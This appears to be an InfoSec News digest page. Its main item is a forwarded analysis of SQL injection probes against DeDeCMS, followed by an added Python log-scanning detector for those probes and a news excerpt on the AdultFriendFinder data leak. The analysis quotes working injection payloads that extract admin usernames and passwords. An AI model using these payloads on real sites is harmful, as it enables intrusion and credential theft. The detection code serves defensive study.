Information Security News
Posted by InfoSec News on May 22
http://www.zdnet.com/article/a-practical-history-of-plane-hacking-beyond-the-hype-and-hysteria/
Posted by InfoSec News on May 22
Forwarded from: bluknight <bluknight () skytalks info>
Typically we try to divide attackers into different groups, all the way from Script Kiddies (no resources, no skills, quite a bit of time/persistence) to more advanced state-sponsored attackers (lots of resources, decent skills and ability to conduct long lasting persistent attacks).
So it was a bit odd to see an attack against a rather old vulnerability in DeDeCMS. The attack:
GET /uploads/plus/search.php?keyword=11typeArr[%60@%27%60and%28SELECT1%20FROM%28selectcount%28*%29,concat%28floor%28rand%280%29*2%29,%28SELECT/*%27*/concat%280x5f,userid,0x5f,pwd,0x5f%29fromdede_adminLimit0,1%29%29afrominformation_schema.tables%20group%20by%20a%29b%29]=1 HTTP/1.1 301 178 - Python-urllib/2.7
DeDeCMS is a Drupal-like content management system popular in China. Exploits like the one above have been used at least since 2013. The site that was attacked above does not use DeDeCMS, so the attacker did not do any reconnaissance.
The attacker also doesn't bother modifying the user agent and keeps the Python-urllib/2.7 user agent, indicating that the tool used to conduct the scan was written in Python. Many web application firewalls would block the request just for using that user agent.
The SQL statement that is being attempted:
SELECT 1 FROM(select count(*),concat(floor(rand(0)*2),(SELECT/**/concat(0x5f,userid,0x5f,pwd,0x5f) from dede_admin Limit 0,1))a from information_schema.tables group by a)b)]=1
A nice piece of SQL obfuscation, but I believe the goal is to retrieve the first username and password from the dede_admin table.
Sort of interesting: These were not the only attacks from these two IP addresses, and they did start out with some reconnaissance:
GET / HTTP/1.1 301 178 - +http://www.google.com/bot.html)
Here they spoof the Google user agent. They even first try out the plus/search.php URL:
GET //plus/search.php?keyword=astypeArr[111%3D@`\x5C`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\x5C`+]=a HTTP/1.1 404 9093 - +http://www.google.com/bot.html)
But even though it returns a 404, they still proceed with the attack.
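Detection logic for the probes quoted above, as an added example that is not part of the forwarded post: it parses access log lines in Apache "combined" format (an assumption about the log format; the four lines embedded below are constructed for this example, with the request paths and user agents taken from the post), URL-decodes each request, strips the `/**/`-style comment obfuscation, and flags the union-select and `floor(rand(0)*2)` error-based injection signatures, the DeDeCMS `typeArr[` parameter, the default Python-urllib scanner user agent, a user agent that merely claims to be Googlebot, and a source that keeps attacking after its first probe returned a 404. Note that the injection sits in the parameter *name* (`typeArr[...]`), not the value, so a filter that inspects only values would miss it.

```python
"""Flag DeDeCMS-style SQL injection probes and scanner fingerprints in web logs.

Added example; not code from the forwarded post. Log format is assumed to be
Apache combined format; the sample lines are constructed for this example.
"""
import re
from collections import defaultdict
from typing import Optional
from urllib.parse import unquote_plus

# Apache combined log format (assumption about the log source).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Signatures for the techniques shown in the post, matched against the decoded,
# comment-stripped, lower-cased request. No \b anchors: the payload glues tokens
# together ("fromdede_admin", "afrominformation_schema").
SQLI_SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "error_based_floor_rand": re.compile(r"floor\(rand\(0\)\*2\)"),
    "information_schema": re.compile(r"information_schema"),
    "dede_admin_table": re.compile(r"dede_admin|@__admin"),
    "dedecms_typearr_param": re.compile(r"/plus/search\.php\?.*typearr\["),
}

SCANNER_UA = re.compile(r"python-urllib|python-requests|curl/|libwww-perl", re.I)
GOOGLEBOT_UA = re.compile(r"googlebot|google\.com/bot\.html", re.I)


def normalise_request(path: str) -> str:
    """URL-decode (twice, for double-encoded payloads), drop /*...*/ comments,
    collapse whitespace and lower-case so the signatures match reliably."""
    decoded = unquote_plus(unquote_plus(path))
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)
    decoded = re.sub(r"\s+", " ", decoded)
    return decoded.lower()


def analyse_line(line: str) -> Optional[dict]:
    """Return a finding for one log line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    req = normalise_request(m.group("path"))
    hits = [name for name, rx in SQLI_SIGNATURES.items() if rx.search(req)]
    ua = m.group("ua")
    ua_flags = []
    if SCANNER_UA.search(ua):
        ua_flags.append("scanner_user_agent")
    if GOOGLEBOT_UA.search(ua):
        # A Googlebot claim cannot be verified offline; real verification
        # needs a reverse DNS lookup followed by a forward lookup.
        ua_flags.append("claims_googlebot_unverified")
    return {
        "ip": m.group("ip"),
        "path": m.group("path"),
        "status": int(m.group("status")),
        "sqli": hits,
        "ua_flags": ua_flags,
        "is_attack": bool(hits),
    }


def summarise_by_ip(findings):
    """Per-source summary: injection attempts, user-agent flags, and whether the
    source kept attacking after a 404 (the 'no reconnaissance' behaviour)."""
    by_ip = defaultdict(lambda: {"requests": 0, "sqli_attempts": 0,
                                 "saw_404_then_attacked": False, "ua_flags": set()})
    seen_404 = set()
    for f in findings:
        s = by_ip[f["ip"]]
        s["requests"] += 1
        s["ua_flags"].update(f["ua_flags"])
        if f["is_attack"]:
            s["sqli_attempts"] += 1
            if f["ip"] in seen_404:
                s["saw_404_then_attacked"] = True
        if f["status"] == 404:
            seen_404.add(f["ip"])
    return dict(by_ip)


def scan(lines):
    """Analyse every parseable line and return (findings, per-IP summary)."""
    findings = [f for f in map(analyse_line, lines) if f is not None]
    return findings, summarise_by_ip(findings)


# Constructed sample log: one benign request, then the sequence from the post
# (spoofed Googlebot recon, the 404'd union-select probe, the error-based payload).
GOOGLEBOT = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
SAMPLE_LOG = [
    '203.0.113.5 - - [22/May/2015:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    f'198.51.100.7 - - [22/May/2015:10:01:00 +0000] "GET / HTTP/1.1" 301 178 "-" "{GOOGLEBOT}"',
    '198.51.100.7 - - [22/May/2015:10:01:05 +0000] "GET //plus/search.php?keyword=astypeArr[111%3D@`\\x5C`)'
    '+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,pwd,15+from+`%23@__admin`%23@`\\x5C`+]=a HTTP/1.1" '
    f'404 9093 "-" "{GOOGLEBOT}"',
    '198.51.100.7 - - [22/May/2015:10:01:09 +0000] "GET /uploads/plus/search.php?keyword=11typeArr[%60@%27%60'
    'and%28SELECT1%20FROM%28selectcount%28*%29,concat%28floor%28rand%280%29*2%29,%28SELECT/*%27*/concat%28'
    '0x5f,userid,0x5f,pwd,0x5f%29fromdede_adminLimit0,1%29%29afrominformation_schema.tables%20group%20by'
    '%20a%29b%29]=1 HTTP/1.1" 301 178 "-" "Python-urllib/2.7"',
]

if __name__ == "__main__":
    found, summary = scan(SAMPLE_LOG)
    for f in found:
        if f["is_attack"] or f["ua_flags"]:
            print(f["ip"], f["status"], f["sqli"], f["ua_flags"])
    for ip, s in summary.items():
        print(ip, s)
```

The per-IP summary is what turns single alerts into a picture of the source: two injection attempts, a claimed-but-unverified Googlebot identity, and an attack that continued after the probed path returned 404 is exactly the "no reconnaissance, default tooling" profile the post describes, and a reasonable trigger for blocking the source rather than just the request.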
Posted by InfoSec News on May 22
http://arstechnica.com/security/2015/05/flawed-android-factory-reset-leaves-crypto-and-login-keys-ripe-for-picking/
Infosec practitioners face host of challenges
Boshoff says infosec improvements are being hindered by a lack of buy-in and support from business. "It is very difficult for security practitioners to successfully implement security protocols within an organisation when they have resistance from the ...
E-mail addresses, sexual orientations, and other sensitive details from almost four million AdultFriendFinder.com subscribers have been leaked onto the Internet following a hack that rooted the casual dating service, security researchers said.
The cache includes more than 3.8 million unique e-mail addresses of current and former subscribers, Australian security researcher Troy Hunt reported early Friday morning. The data, which is in the form of 15 Microsoft Excel spreadsheets, was first seeded to anonymous sites hosted on the Tor privacy network. It has since spread to sites on the open Internet. Links to sites hosting the data are easily found on Twitter and other social networking sites (Ars isn't publishing the locations).
The compromise was first reported by British broadcaster Channel 4. In addition to including e-mail addresses and the sexual orientations of users, the data also provided other sensitive information, such as ages, zip codes, and whether the subscriber was seeking an extramarital affair. The trove included information for deleted accounts as well as those still current.